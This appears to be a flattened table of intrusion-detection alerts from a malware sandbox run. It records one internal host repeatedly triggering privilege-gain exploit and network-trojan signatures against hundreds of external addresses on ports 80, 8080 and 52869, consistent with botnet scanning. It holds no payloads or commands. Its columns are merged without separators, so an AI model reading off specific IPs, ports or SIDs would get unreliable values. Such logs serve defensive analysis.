                            2024-12-06T00:37:29.865130+010020292151Attempted Administrator Privilege Gain192.168.2.234565460.159.210.168080TCP
                            2024-12-06T00:37:29.919845+010020292151Attempted Administrator Privilege Gain192.168.2.235579211.95.223.1968080TCP
                            2024-12-06T00:37:30.854814+010020292151Attempted Administrator Privilege Gain192.168.2.2339810179.34.222.38080TCP
                            2024-12-06T00:37:30.870719+010020292151Attempted Administrator Privilege Gain192.168.2.234482473.0.89.4980TCP
                            2024-12-06T00:37:30.908288+010020292151Attempted Administrator Privilege Gain192.168.2.2338878141.86.150.19080TCP
                            2024-12-06T00:37:30.926106+010020292151Attempted Administrator Privilege Gain192.168.2.2347804101.65.198.25480TCP
                            2024-12-06T00:37:30.926476+010020292151Attempted Administrator Privilege Gain192.168.2.23585902.214.23.1978080TCP
                            2024-12-06T00:37:30.926857+010020292151Attempted Administrator Privilege Gain192.168.2.2357474205.139.0.2368080TCP
                            2024-12-06T00:37:30.933379+010020292151Attempted Administrator Privilege Gain192.168.2.233675831.0.16.880TCP
                            2024-12-06T00:37:30.942833+010020292151Attempted Administrator Privilege Gain192.168.2.2360066201.77.183.3880TCP
                            2024-12-06T00:37:31.943080+010020292151Attempted Administrator Privilege Gain192.168.2.2339840123.117.143.1638080TCP
                            2024-12-06T00:37:31.944192+010020292151Attempted Administrator Privilege Gain192.168.2.2348400153.132.165.2198080TCP
                            2024-12-06T00:37:31.944559+010020292151Attempted Administrator Privilege Gain192.168.2.2339960120.95.97.2478080TCP
                            2024-12-06T00:37:34.933957+010020292151Attempted Administrator Privilege Gain192.168.2.235163866.41.100.2058080TCP
                            2024-12-06T00:37:34.937951+010020292151Attempted Administrator Privilege Gain192.168.2.2340852163.125.137.1268080TCP
                            2024-12-06T00:37:35.862249+010020292151Attempted Administrator Privilege Gain192.168.2.236007076.89.90.9680TCP
                            2024-12-06T00:37:35.865534+010020292151Attempted Administrator Privilege Gain192.168.2.2344720201.189.210.1288080TCP
                            2024-12-06T00:37:35.866268+010020292151Attempted Administrator Privilege Gain192.168.2.234333074.182.50.16580TCP
                            2024-12-06T00:37:35.866643+010020292151Attempted Administrator Privilege Gain192.168.2.235456041.229.171.1348080TCP
                            2024-12-06T00:37:35.868109+010020292151Attempted Administrator Privilege Gain192.168.2.2355260156.217.155.12480TCP
                            2024-12-06T00:37:35.888813+010020292151Attempted Administrator Privilege Gain192.168.2.2336864199.180.164.2178080TCP
                            2024-12-06T00:37:35.901870+010020292151Attempted Administrator Privilege Gain192.168.2.2337110208.163.47.17080TCP
                            2024-12-06T00:37:37.898232+010020292151Attempted Administrator Privilege Gain192.168.2.233590272.133.244.1280TCP
                            2024-12-06T00:37:37.900433+010020292151Attempted Administrator Privilege Gain192.168.2.2358796135.195.106.6680TCP
                            2024-12-06T00:37:37.905925+010020292151Attempted Administrator Privilege Gain192.168.2.2352316135.126.129.98080TCP
                            2024-12-06T00:37:37.920099+010020292151Attempted Administrator Privilege Gain192.168.2.2339622157.36.53.2980TCP
                            2024-12-06T00:37:37.939816+010020292151Attempted Administrator Privilege Gain192.168.2.234313412.192.0.38080TCP
                            2024-12-06T00:37:38.864023+010020292151Attempted Administrator Privilege Gain192.168.2.2360986200.243.100.16480TCP
                            2024-12-06T00:37:38.864764+010020292151Attempted Administrator Privilege Gain192.168.2.2348972118.0.61.2228080TCP
                            2024-12-06T00:37:38.910588+010020292151Attempted Administrator Privilege Gain192.168.2.236000814.93.121.15080TCP
                            2024-12-06T00:37:38.916768+010020292151Attempted Administrator Privilege Gain192.168.2.2359268218.24.88.4280TCP
                            2024-12-06T00:37:39.849063+010020292151Attempted Administrator Privilege Gain192.168.2.233584249.129.141.8280TCP
                            2024-12-06T00:37:39.891802+010020292151Attempted Administrator Privilege Gain192.168.2.235931894.243.222.22480TCP
                            2024-12-06T00:37:40.730047+010020292151Attempted Administrator Privilege Gain192.168.2.2353358197.117.85.2308080TCP
                            2024-12-06T00:37:40.926639+010020292151Attempted Administrator Privilege Gain192.168.2.2360558144.55.217.2580TCP
                            2024-12-06T00:37:41.904992+010020292151Attempted Administrator Privilege Gain192.168.2.235270231.87.32.17980TCP
                            2024-12-06T00:37:42.848298+010020292151Attempted Administrator Privilege Gain192.168.2.2337800207.4.247.680TCP
                            2024-12-06T00:37:42.875513+010020292151Attempted Administrator Privilege Gain192.168.2.2346916218.184.194.19780TCP
                            2024-12-06T00:37:43.871202+010020292151Attempted Administrator Privilege Gain192.168.2.234276474.252.107.16380TCP
                            2024-12-06T00:37:43.893710+010020292151Attempted Administrator Privilege Gain192.168.2.2358350137.136.55.16880TCP
                            2024-12-06T00:37:43.930110+010020292151Attempted Administrator Privilege Gain192.168.2.23403982.191.113.14480TCP
                            2024-12-06T00:37:43.931232+010020292151Attempted Administrator Privilege Gain192.168.2.2359352171.151.153.2308080TCP
                            2024-12-06T00:37:43.931962+010020292151Attempted Administrator Privilege Gain192.168.2.2334132131.159.125.10080TCP
                            2024-12-06T00:37:45.843818+010020292151Attempted Administrator Privilege Gain192.168.2.2359606221.0.24.7280TCP
                            2024-12-06T00:37:45.868511+010020292151Attempted Administrator Privilege Gain192.168.2.2353446105.104.182.13080TCP
                            2024-12-06T00:37:45.908851+010020292151Attempted Administrator Privilege Gain192.168.2.2343692211.57.194.7980TCP
                            2024-12-06T00:37:46.867668+010020292151Attempted Administrator Privilege Gain192.168.2.2343766200.77.31.2128080TCP
                            2024-12-06T00:37:46.895155+010020292151Attempted Administrator Privilege Gain192.168.2.2348894201.212.218.3780TCP
                            2024-12-06T00:37:46.897349+010020292151Attempted Administrator Privilege Gain192.168.2.2340758120.68.42.18480TCP
                            2024-12-06T00:37:46.902491+010020292151Attempted Administrator Privilege Gain192.168.2.23606985.59.59.1808080TCP
                            2024-12-06T00:37:47.879295+010020292151Attempted Administrator Privilege Gain192.168.2.234954453.239.213.5880TCP
                            2024-12-06T00:37:47.915653+010020292151Attempted Administrator Privilege Gain192.168.2.234386645.176.18.1028080TCP
                            2024-12-06T00:37:48.880113+010020292151Attempted Administrator Privilege Gain192.168.2.2355236111.198.168.578080TCP
                            2024-12-06T00:37:48.897982+010020292151Attempted Administrator Privilege Gain192.168.2.234394833.166.72.1858080TCP
                            2024-12-06T00:37:49.856734+010020292151Attempted Administrator Privilege Gain192.168.2.2360866133.141.148.2338080TCP
                            2024-12-06T00:37:49.861189+010020292151Attempted Administrator Privilege Gain192.168.2.2335414104.136.146.2348080TCP
                            2024-12-06T00:37:49.877908+010020292151Attempted Administrator Privilege Gain192.168.2.233388239.254.157.298080TCP
                            2024-12-06T00:37:49.878655+010020292151Attempted Administrator Privilege Gain192.168.2.234184485.207.18.180TCP
                            2024-12-06T00:37:49.917675+010020292151Attempted Administrator Privilege Gain192.168.2.234972484.246.234.1198080TCP
                            2024-12-06T00:37:49.927127+010020292151Attempted Administrator Privilege Gain192.168.2.233863663.131.84.1158080TCP
                            2024-12-06T00:37:50.875593+010020292151Attempted Administrator Privilege Gain192.168.2.2344796187.184.17.638080TCP
                            2024-12-06T00:37:50.890143+010020292151Attempted Administrator Privilege Gain192.168.2.233347016.149.53.1518080TCP
                            2024-12-06T00:37:50.928662+010020292151Attempted Administrator Privilege Gain192.168.2.2336782214.192.111.11380TCP
                            2024-12-06T00:37:50.931577+010020292151Attempted Administrator Privilege Gain192.168.2.23461845.138.139.6980TCP
                            2024-12-06T00:37:51.867977+010020292151Attempted Administrator Privilege Gain192.168.2.233894260.58.179.10580TCP
                            2024-12-06T00:37:51.904086+010020292151Attempted Administrator Privilege Gain192.168.2.2344100221.5.55.1448080TCP
                            2024-12-06T00:37:51.920902+010020292151Attempted Administrator Privilege Gain192.168.2.2347916159.220.97.548080TCP
                            2024-12-06T00:37:52.835020+010020292151Attempted Administrator Privilege Gain192.168.2.235988629.112.84.23880TCP
                            2024-12-06T00:37:52.888880+010020292151Attempted Administrator Privilege Gain192.168.2.2337122177.57.9.2380TCP
                            2024-12-06T00:37:53.891624+010020292151Attempted Administrator Privilege Gain192.168.2.234267442.109.51.2268080TCP
                            2024-12-06T00:37:54.866091+010020292151Attempted Administrator Privilege Gain192.168.2.2359496193.56.19.21280TCP
                            2024-12-06T00:37:54.874113+010020292151Attempted Administrator Privilege Gain192.168.2.233521818.170.145.2338080TCP
                            2024-12-06T00:37:54.879214+010020292151Attempted Administrator Privilege Gain192.168.2.2345518178.123.28.080TCP
                            2024-12-06T00:37:55.915872+010020292151Attempted Administrator Privilege Gain192.168.2.2346528132.95.148.10280TCP
                            2024-12-06T00:37:56.858764+010020292151Attempted Administrator Privilege Gain192.168.2.2336144139.201.152.080TCP
                            2024-12-06T00:37:57.897486+010020292151Attempted Administrator Privilege Gain192.168.2.2348884128.146.162.8880TCP
                            2024-12-06T00:37:57.909901+010020292151Attempted Administrator Privilege Gain192.168.2.2358866155.228.213.11480TCP
                            2024-12-06T00:37:57.944064+010020292151Attempted Administrator Privilege Gain192.168.2.2358832197.254.214.158080TCP
                            2024-12-06T00:37:58.879241+010020292151Attempted Administrator Privilege Gain192.168.2.233743640.20.89.2388080TCP
                            2024-12-06T00:37:59.863755+010020292151Attempted Administrator Privilege Gain192.168.2.2347686130.70.89.14080TCP
                            2024-12-06T00:37:59.908971+010020292151Attempted Administrator Privilege Gain192.168.2.234992458.103.8.1878080TCP
                            2024-12-06T00:38:00.884031+010020292151Attempted Administrator Privilege Gain192.168.2.23541427.244.177.20280TCP
                            2024-12-06T00:38:00.927981+010020292151Attempted Administrator Privilege Gain192.168.2.2351796162.58.199.1898080TCP
                            2024-12-06T00:38:01.851722+010020292151Attempted Administrator Privilege Gain192.168.2.2352018171.187.9.17780TCP
                            2024-12-06T00:38:01.909420+010020292151Attempted Administrator Privilege Gain192.168.2.233726249.76.1.7780TCP
                            2024-12-06T00:38:02.866313+010020292151Attempted Administrator Privilege Gain192.168.2.2353272167.129.204.480TCP
                            2024-12-06T00:38:02.866685+010020292151Attempted Administrator Privilege Gain192.168.2.2355364205.31.52.1098080TCP
                            2024-12-06T00:38:02.867399+010020292151Attempted Administrator Privilege Gain192.168.2.2347160213.41.163.15580TCP
                            2024-12-06T00:38:02.868504+010020292151Attempted Administrator Privilege Gain192.168.2.2333648138.94.183.2468080TCP
                            2024-12-06T00:38:02.881206+010020292151Attempted Administrator Privilege Gain192.168.2.233392459.130.197.6280TCP
                            2024-12-06T00:38:03.876356+010020292151Attempted Administrator Privilege Gain192.168.2.235580263.26.73.1168080TCP
                            2024-12-06T00:38:03.930515+010020292151Attempted Administrator Privilege Gain192.168.2.235949654.218.71.1098080TCP
                            2024-12-06T00:38:04.875053+010020292151Attempted Administrator Privilege Gain192.168.2.2343080189.42.102.13480TCP
                            2024-12-06T00:38:04.941446+010020292151Attempted Administrator Privilege Gain192.168.2.2334486190.170.173.1328080TCP
                            2024-12-06T00:38:04.942171+010020292151Attempted Administrator Privilege Gain192.168.2.234108070.99.243.1558080TCP
                            2024-12-06T00:38:05.850502+010020292151Attempted Administrator Privilege Gain192.168.2.2348246170.16.125.20880TCP
                            2024-12-06T00:38:05.881431+010020292151Attempted Administrator Privilege Gain192.168.2.2351614168.131.71.9680TCP
                            2024-12-06T00:38:05.895244+010020292151Attempted Administrator Privilege Gain192.168.2.2346200211.118.107.2008080TCP
                            2024-12-06T00:38:05.941235+010020292151Attempted Administrator Privilege Gain192.168.2.2338016174.239.67.5880TCP
                            2024-12-06T00:38:06.855458+010020292151Attempted Administrator Privilege Gain192.168.2.233546689.14.42.12680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T00:37:17.422461+010020270631Attempted Administrator Privilege Gain192.168.2.235309643.79.133.1180TCP
                            2024-12-06T00:37:17.423675+010020270631Attempted Administrator Privilege Gain192.168.2.233937080.180.109.8680TCP
                            2024-12-06T00:37:17.423726+010020270631Attempted Administrator Privilege Gain192.168.2.2351946160.64.200.25080TCP
                            2024-12-06T00:37:17.423846+010020270631Attempted Administrator Privilege Gain192.168.2.2347792152.156.223.1708080TCP
                            2024-12-06T00:37:17.432071+010020270631Attempted Administrator Privilege Gain192.168.2.23462521.98.140.4280TCP
                            2024-12-06T00:37:17.447441+010020270631Attempted Administrator Privilege Gain192.168.2.2335422142.225.53.12980TCP
                            2024-12-06T00:37:17.447672+010020270631Attempted Administrator Privilege Gain192.168.2.2338960102.154.96.7880TCP
                            2024-12-06T00:37:17.448820+010020270631Attempted Administrator Privilege Gain192.168.2.234919468.42.36.21080TCP
                            2024-12-06T00:37:17.450754+010020270631Attempted Administrator Privilege Gain192.168.2.2354214174.112.238.1508080TCP
                            2024-12-06T00:37:17.451014+010020270631Attempted Administrator Privilege Gain192.168.2.234493048.71.73.508080TCP
                            2024-12-06T00:37:17.451443+010020270631Attempted Administrator Privilege Gain192.168.2.234992450.191.49.1718080TCP
                            2024-12-06T00:37:17.463294+010020270631Attempted Administrator Privilege Gain192.168.2.2341216212.175.190.2880TCP
                            2024-12-06T00:37:17.463402+010020270631Attempted Administrator Privilege Gain192.168.2.233347646.14.252.19480TCP
                            2024-12-06T00:37:17.464161+010020270631Attempted Administrator Privilege Gain192.168.2.2335532115.248.132.478080TCP
                            2024-12-06T00:37:17.465715+010020270631Attempted Administrator Privilege Gain192.168.2.2354866212.19.173.1918080TCP
                            2024-12-06T00:37:17.467339+010020270631Attempted Administrator Privilege Gain192.168.2.2348190150.49.139.12980TCP
                            2024-12-06T00:37:17.469129+010020270631Attempted Administrator Privilege Gain192.168.2.233372422.47.205.19480TCP
                            2024-12-06T00:37:17.469187+010020270631Attempted Administrator Privilege Gain192.168.2.2346456149.193.148.348080TCP
                            2024-12-06T00:37:17.469924+010020270631Attempted Administrator Privilege Gain192.168.2.2336408157.88.62.3580TCP
                            2024-12-06T00:37:17.556351+010020270631Attempted Administrator Privilege Gain192.168.2.234982270.136.186.818080TCP
                            2024-12-06T00:37:17.556540+010020270631Attempted Administrator Privilege Gain192.168.2.2348332197.204.137.5880TCP
                            2024-12-06T00:37:17.557471+010020270631Attempted Administrator Privilege Gain192.168.2.233292043.136.192.628080TCP
                            2024-12-06T00:37:17.560263+010020270631Attempted Administrator Privilege Gain192.168.2.233286011.48.182.38080TCP
                            2024-12-06T00:37:17.560799+010020270631Attempted Administrator Privilege Gain192.168.2.235903068.104.71.2438080TCP
                            2024-12-06T00:37:17.561739+010020270631Attempted Administrator Privilege Gain192.168.2.2351940144.80.221.22280TCP
                            2024-12-06T00:37:17.562235+010020270631Attempted Administrator Privilege Gain192.168.2.2348828101.130.93.1928080TCP
                            2024-12-06T00:37:17.562615+010020270631Attempted Administrator Privilege Gain192.168.2.235804676.231.140.11580TCP
                            2024-12-06T00:37:17.562934+010020270631Attempted Administrator Privilege Gain192.168.2.233385814.239.128.17080TCP
                            2024-12-06T00:37:17.566643+010020270631Attempted Administrator Privilege Gain192.168.2.235365448.137.212.428080TCP
                            2024-12-06T00:37:17.566738+010020270631Attempted Administrator Privilege Gain192.168.2.2344338189.229.175.1228080TCP
                            2024-12-06T00:37:17.567389+010020270631Attempted Administrator Privilege Gain192.168.2.2333202153.157.254.308080TCP
                            2024-12-06T00:37:17.567989+010020270631Attempted Administrator Privilege Gain192.168.2.235509048.90.206.1698080TCP
                            2024-12-06T00:37:17.568077+010020270631Attempted Administrator Privilege Gain192.168.2.2343626214.111.203.478080TCP
                            2024-12-06T00:37:17.569126+010020270631Attempted Administrator Privilege Gain192.168.2.233787670.159.0.17280TCP
                            2024-12-06T00:37:17.571078+010020270631Attempted Administrator Privilege Gain192.168.2.2353304182.227.110.2880TCP
                            2024-12-06T00:37:17.571333+010020270631Attempted Administrator Privilege Gain192.168.2.2344440179.184.84.3480TCP
                            2024-12-06T00:37:17.572323+010020270631Attempted Administrator Privilege Gain192.168.2.235187090.153.54.2448080TCP
                            2024-12-06T00:37:17.573007+010020270631Attempted Administrator Privilege Gain192.168.2.2353778162.60.224.628080TCP
                            2024-12-06T00:37:17.573215+010020270631Attempted Administrator Privilege Gain192.168.2.235048673.177.193.22080TCP
                            2024-12-06T00:37:17.573880+010020270631Attempted Administrator Privilege Gain192.168.2.2355692182.149.46.380TCP
                            2024-12-06T00:37:17.574231+010020270631Attempted Administrator Privilege Gain192.168.2.2332856191.77.140.15380TCP
                            2024-12-06T00:37:17.574495+010020270631Attempted Administrator Privilege Gain192.168.2.2349890152.96.212.20880TCP
                            2024-12-06T00:37:17.574982+010020270631Attempted Administrator Privilege Gain192.168.2.2334086215.189.147.1008080TCP
                            2024-12-06T00:37:20.681704+010020270631Attempted Administrator Privilege Gain192.168.2.2348762138.35.154.4680TCP
                            2024-12-06T00:37:28.057014+010020270631Attempted Administrator Privilege Gain192.168.2.2356476203.102.228.878080TCP
                            2024-12-06T00:37:28.119239+010020270631Attempted Administrator Privilege Gain192.168.2.2336132207.54.29.7680TCP
                            2024-12-06T00:37:28.212857+010020270631Attempted Administrator Privilege Gain192.168.2.2358148200.230.30.188080TCP
                            2024-12-06T00:37:28.214386+010020270631Attempted Administrator Privilege Gain192.168.2.2357208103.231.22.138080TCP
                            2024-12-06T00:37:28.214697+010020270631Attempted Administrator Privilege Gain192.168.2.2350988217.144.221.2088080TCP
                            2024-12-06T00:37:28.214821+010020270631Attempted Administrator Privilege Gain192.168.2.2333744158.86.239.378080TCP
                            2024-12-06T00:37:28.216303+010020270631Attempted Administrator Privilege Gain192.168.2.2345958164.50.155.21080TCP
                            2024-12-06T00:37:28.217193+010020270631Attempted Administrator Privilege Gain192.168.2.2359802189.65.195.1880TCP
                            2024-12-06T00:37:28.217516+010020270631Attempted Administrator Privilege Gain192.168.2.2350802205.52.53.2408080TCP
                            2024-12-06T00:37:28.219231+010020270631Attempted Administrator Privilege Gain192.168.2.2359014132.49.92.2228080TCP
                            2024-12-06T00:37:28.220030+010020270631Attempted Administrator Privilege Gain192.168.2.2333322125.187.103.2508080TCP
                            2024-12-06T00:37:28.220316+010020270631Attempted Administrator Privilege Gain192.168.2.235339896.215.244.8580TCP
                            2024-12-06T00:37:28.221052+010020270631Attempted Administrator Privilege Gain192.168.2.2353188167.239.72.5880TCP
                            2024-12-06T00:37:28.221426+010020270631Attempted Administrator Privilege Gain192.168.2.234653496.99.41.1308080TCP
                            2024-12-06T00:37:28.221946+010020270631Attempted Administrator Privilege Gain192.168.2.2346678160.212.70.2180TCP
                            2024-12-06T00:37:28.223379+010020270631Attempted Administrator Privilege Gain192.168.2.233603026.105.98.7080TCP
                            2024-12-06T00:37:28.292407+010020270631Attempted Administrator Privilege Gain192.168.2.234883216.177.230.178080TCP
                            2024-12-06T00:37:28.323092+010020270631Attempted Administrator Privilege Gain192.168.2.235165848.181.195.148080TCP
                            2024-12-06T00:37:28.323255+010020270631Attempted Administrator Privilege Gain192.168.2.234811833.72.49.858080TCP
                            2024-12-06T00:37:28.324302+010020270631Attempted Administrator Privilege Gain192.168.2.234694299.76.48.15880TCP
                            2024-12-06T00:37:28.324639+010020270631Attempted Administrator Privilege Gain192.168.2.2352294197.68.216.10980TCP
                            2024-12-06T00:37:28.345814+010020270631Attempted Administrator Privilege Gain192.168.2.2343258183.178.42.19180TCP
                            2024-12-06T00:37:28.346787+010020270631Attempted Administrator Privilege Gain192.168.2.2348514109.3.50.608080TCP
                            2024-12-06T00:37:28.346982+010020270631Attempted Administrator Privilege Gain192.168.2.2333500140.24.155.938080TCP
                            2024-12-06T00:37:28.348125+010020270631Attempted Administrator Privilege Gain192.168.2.2342800196.223.36.1728080TCP
                            2024-12-06T00:37:28.386081+010020270631Attempted Administrator Privilege Gain192.168.2.2355668156.158.132.22180TCP
                            2024-12-06T00:37:28.386675+010020270631Attempted Administrator Privilege Gain192.168.2.233437478.132.73.22480TCP
                            2024-12-06T00:37:28.431940+010020270631Attempted Administrator Privilege Gain192.168.2.2359598102.187.77.1948080TCP
                            2024-12-06T00:37:28.432111+010020270631Attempted Administrator Privilege Gain192.168.2.2354212188.84.47.8380TCP
                            2024-12-06T00:37:28.432715+010020270631Attempted Administrator Privilege Gain192.168.2.233450648.133.51.15580TCP
                            2024-12-06T00:37:28.432984+010020270631Attempted Administrator Privilege Gain192.168.2.2338142209.75.120.19880TCP
                            2024-12-06T00:37:28.433635+010020270631Attempted Administrator Privilege Gain192.168.2.235511664.77.154.21980TCP
                            2024-12-06T00:37:28.433848+010020270631Attempted Administrator Privilege Gain192.168.2.2360798112.153.207.1158080TCP
                            2024-12-06T00:37:28.434662+010020270631Attempted Administrator Privilege Gain192.168.2.2337098138.112.67.10080TCP
                            2024-12-06T00:37:29.088443+010020270631Attempted Administrator Privilege Gain192.168.2.233768625.107.103.68080TCP
                            2024-12-06T00:37:29.089454+010020270631Attempted Administrator Privilege Gain192.168.2.2342798171.151.107.15380TCP
                            2024-12-06T00:37:29.090246+010020270631Attempted Administrator Privilege Gain192.168.2.2340470192.152.41.1938080TCP
                            2024-12-06T00:37:39.346021+010020270631Attempted Administrator Privilege Gain192.168.2.23358824.167.46.13880TCP
                            2024-12-06T00:37:39.346185+010020270631Attempted Administrator Privilege Gain192.168.2.2360250197.135.110.128080TCP
                            2024-12-06T00:37:39.346397+010020270631Attempted Administrator Privilege Gain192.168.2.2343242136.179.98.22580TCP
                            2024-12-06T00:37:39.353628+010020270631Attempted Administrator Privilege Gain192.168.2.233969428.121.234.17180TCP
                            2024-12-06T00:37:39.447246+010020270631Attempted Administrator Privilege Gain192.168.2.234108097.161.172.1348080TCP
                            2024-12-06T00:37:39.463019+010020270631Attempted Administrator Privilege Gain192.168.2.2338394118.202.244.6680TCP
                            2024-12-06T00:37:39.463124+010020270631Attempted Administrator Privilege Gain192.168.2.2356934200.25.215.13380TCP
                            2024-12-06T00:37:39.494232+010020270631Attempted Administrator Privilege Gain192.168.2.2356654137.59.53.2158080TCP
                            2024-12-06T00:37:39.494333+010020270631Attempted Administrator Privilege Gain192.168.2.2356980130.173.78.16380TCP
                            2024-12-06T00:37:40.213131+010020270631Attempted Administrator Privilege Gain192.168.2.2344612135.5.55.7080TCP
                            2024-12-06T00:37:40.433317+010020270631Attempted Administrator Privilege Gain192.168.2.2353352158.47.178.1168080TCP
                            2024-12-06T00:37:40.447750+010020270631Attempted Administrator Privilege Gain192.168.2.2346438161.57.64.24580TCP
                            2024-12-06T00:37:40.510308+010020270631Attempted Administrator Privilege Gain192.168.2.234559848.100.225.208080TCP
                            2024-12-06T00:37:41.119992+010020270631Attempted Administrator Privilege Gain192.168.2.233824692.230.178.2680TCP
                            2024-12-06T00:37:41.120091+010020270631Attempted Administrator Privilege Gain192.168.2.2347898125.119.184.178080TCP
                            2024-12-06T00:37:41.120881+010020270631Attempted Administrator Privilege Gain192.168.2.2344590166.140.109.22280TCP
                            2024-12-06T00:37:41.120995+010020270631Attempted Administrator Privilege Gain192.168.2.233850219.180.163.10180TCP
                            2024-12-06T00:37:42.072535+010020270631Attempted Administrator Privilege Gain192.168.2.2350140123.98.76.11380TCP
                            2024-12-06T00:37:42.416298+010020270631Attempted Administrator Privilege Gain192.168.2.233908424.143.8.478080TCP
                            2024-12-06T00:37:42.431802+010020270631Attempted Administrator Privilege Gain192.168.2.234763029.122.56.1038080TCP
                            2024-12-06T00:37:42.432305+010020270631Attempted Administrator Privilege Gain192.168.2.2349836168.124.134.24380TCP
                            2024-12-06T00:37:42.447442+010020270631Attempted Administrator Privilege Gain192.168.2.2337760209.195.134.2128080TCP
                            2024-12-06T00:37:42.447618+010020270631Attempted Administrator Privilege Gain192.168.2.2352718117.115.249.8780TCP
                            2024-12-06T00:37:42.478535+010020270631Attempted Administrator Privilege Gain192.168.2.234893861.217.7.21980TCP
                            2024-12-06T00:37:42.494313+010020270631Attempted Administrator Privilege Gain192.168.2.234532260.115.18.1128080TCP
                            2024-12-06T00:37:42.509901+010020270631Attempted Administrator Privilege Gain192.168.2.2342362219.123.46.828080TCP
                            2024-12-06T00:37:42.510123+010020270631Attempted Administrator Privilege Gain192.168.2.23369342.186.161.1988080TCP
                            2024-12-06T00:37:43.119835+010020270631Attempted Administrator Privilege Gain192.168.2.2338150180.23.193.19380TCP
                            2024-12-06T00:37:43.119844+010020270631Attempted Administrator Privilege Gain192.168.2.2359724131.52.222.21480TCP
                            2024-12-06T00:37:43.135525+010020270631Attempted Administrator Privilege Gain192.168.2.2354276151.243.65.1788080TCP
                            2024-12-06T00:37:46.072549+010020270631Attempted Administrator Privilege Gain192.168.2.2348240182.20.57.1988080TCP
                            2024-12-06T00:37:46.135497+010020270631Attempted Administrator Privilege Gain192.168.2.2339302130.211.189.24680TCP
                            2024-12-06T00:37:46.181871+010020270631Attempted Administrator Privilege Gain192.168.2.2341904199.32.40.928080TCP
                            2024-12-06T00:37:47.137035+010020270631Attempted Administrator Privilege Gain192.168.2.2348424193.85.195.20180TCP
                            2024-12-06T00:37:47.137280+010020270631Attempted Administrator Privilege Gain192.168.2.2341604179.228.190.11380TCP
                            2024-12-06T00:37:49.135107+010020270631Attempted Administrator Privilege Gain192.168.2.235219875.39.160.1780TCP
                            2024-12-06T00:37:49.135461+010020270631Attempted Administrator Privilege Gain192.168.2.234915878.54.102.478080TCP
                            2024-12-06T00:37:50.010460+010020270631Attempted Administrator Privilege Gain192.168.2.2333480151.38.93.1658080TCP
                            2024-12-06T00:37:50.010493+010020270631Attempted Administrator Privilege Gain192.168.2.2351358201.179.154.580TCP
                            2024-12-06T00:37:50.010507+010020270631Attempted Administrator Privilege Gain192.168.2.2339174216.56.177.1018080TCP
                            2024-12-06T00:37:50.010755+010020270631Attempted Administrator Privilege Gain192.168.2.2344464182.254.2.9780TCP
                            2024-12-06T00:37:50.978749+010020270631Attempted Administrator Privilege Gain192.168.2.2352754195.208.186.2238080TCP
                            2024-12-06T00:37:50.994488+010020270631Attempted Administrator Privilege Gain192.168.2.23520826.49.170.518080TCP
                            2024-12-06T00:37:52.963372+010020270631Attempted Administrator Privilege Gain192.168.2.2345912102.222.97.118080TCP
                            2024-12-06T00:37:53.119635+010020270631Attempted Administrator Privilege Gain192.168.2.234230818.187.138.458080TCP
                            2024-12-06T00:37:54.072832+010020270631Attempted Administrator Privilege Gain192.168.2.2347434216.28.230.2080TCP
                            2024-12-06T00:37:54.072899+010020270631Attempted Administrator Privilege Gain192.168.2.2336648190.159.44.1938080TCP
                            2024-12-06T00:37:55.088395+010020270631Attempted Administrator Privilege Gain192.168.2.235741838.46.178.5580TCP
                            2024-12-06T00:37:56.088614+010020270631Attempted Administrator Privilege Gain192.168.2.235602262.2.31.8880TCP
                            2024-12-06T00:37:56.182594+010020270631Attempted Administrator Privilege Gain192.168.2.2340008169.186.142.16880TCP
                            2024-12-06T00:37:57.026016+010020270631Attempted Administrator Privilege Gain192.168.2.2347428102.34.229.758080TCP
                            2024-12-06T00:37:57.026121+010020270631Attempted Administrator Privilege Gain192.168.2.23328686.70.46.1698080TCP
                            2024-12-06T00:37:57.041619+010020270631Attempted Administrator Privilege Gain192.168.2.2333470131.76.152.1388080TCP
                            2024-12-06T00:37:57.041690+010020270631Attempted Administrator Privilege Gain192.168.2.23340926.79.28.20580TCP
                            2024-12-06T00:37:58.010540+010020270631Attempted Administrator Privilege Gain192.168.2.23607843.253.116.23280TCP
                            2024-12-06T00:37:58.026006+010020270631Attempted Administrator Privilege Gain192.168.2.2335868195.224.177.238080TCP
                            2024-12-06T00:37:58.057089+010020270631Attempted Administrator Privilege Gain192.168.2.233496685.216.218.558080TCP
                            2024-12-06T00:37:58.135516+010020270631Attempted Administrator Privilege Gain192.168.2.2357372192.106.15.498080TCP
                            2024-12-06T00:37:58.166592+010020270631Attempted Administrator Privilege Gain192.168.2.2357276120.29.235.480TCP
                            2024-12-06T00:38:00.041773+010020270631Attempted Administrator Privilege Gain192.168.2.2342702134.87.227.8280TCP
                            2024-12-06T00:38:00.041971+010020270631Attempted Administrator Privilege Gain192.168.2.2337372116.235.110.918080TCP
                            2024-12-06T00:38:00.042489+010020270631Attempted Administrator Privilege Gain192.168.2.2334298106.58.97.4380TCP
                            2024-12-06T00:38:00.963956+010020270631Attempted Administrator Privilege Gain192.168.2.234827640.184.62.11480TCP
                            2024-12-06T00:38:00.995144+010020270631Attempted Administrator Privilege Gain192.168.2.2333838202.134.81.2008080TCP
                            2024-12-06T00:38:01.041575+010020270631Attempted Administrator Privilege Gain192.168.2.234041222.102.138.1338080TCP
                            2024-12-06T00:38:01.963901+010020270631Attempted Administrator Privilege Gain192.168.2.234033040.161.115.848080TCP
                            2024-12-06T00:38:03.010354+010020270631Attempted Administrator Privilege Gain192.168.2.234440820.192.54.698080TCP
                            2024-12-06T00:38:03.057294+010020270631Attempted Administrator Privilege Gain192.168.2.234385889.209.200.1580TCP
                            2024-12-06T00:38:03.964087+010020270631Attempted Administrator Privilege Gain192.168.2.23441805.90.227.15880TCP
                            2024-12-06T00:38:04.963790+010020270631Attempted Administrator Privilege Gain192.168.2.234375867.6.149.38080TCP
                            2024-12-06T00:38:05.010596+010020270631Attempted Administrator Privilege Gain192.168.2.234918442.34.149.558080TCP
                            2024-12-06T00:38:05.088666+010020270631Attempted Administrator Privilege Gain192.168.2.2345946151.165.125.2068080TCP
                            2024-12-06T00:38:06.166795+010020270631Attempted Administrator Privilege Gain192.168.2.2343654148.131.165.3980TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-06T00:36:58.055850+010020273391A Network Trojan was detected192.168.2.2347336114.134.116.21452869TCP
                            2024-12-06T00:37:05.854983+010020273391A Network Trojan was detected192.168.2.234727898.35.241.7852869TCP
                            2024-12-06T00:37:05.865404+010020273391A Network Trojan was detected192.168.2.2337388121.208.165.18552869TCP
                            2024-12-06T00:37:05.869130+010020273391A Network Trojan was detected192.168.2.2353898140.49.192.1152869TCP
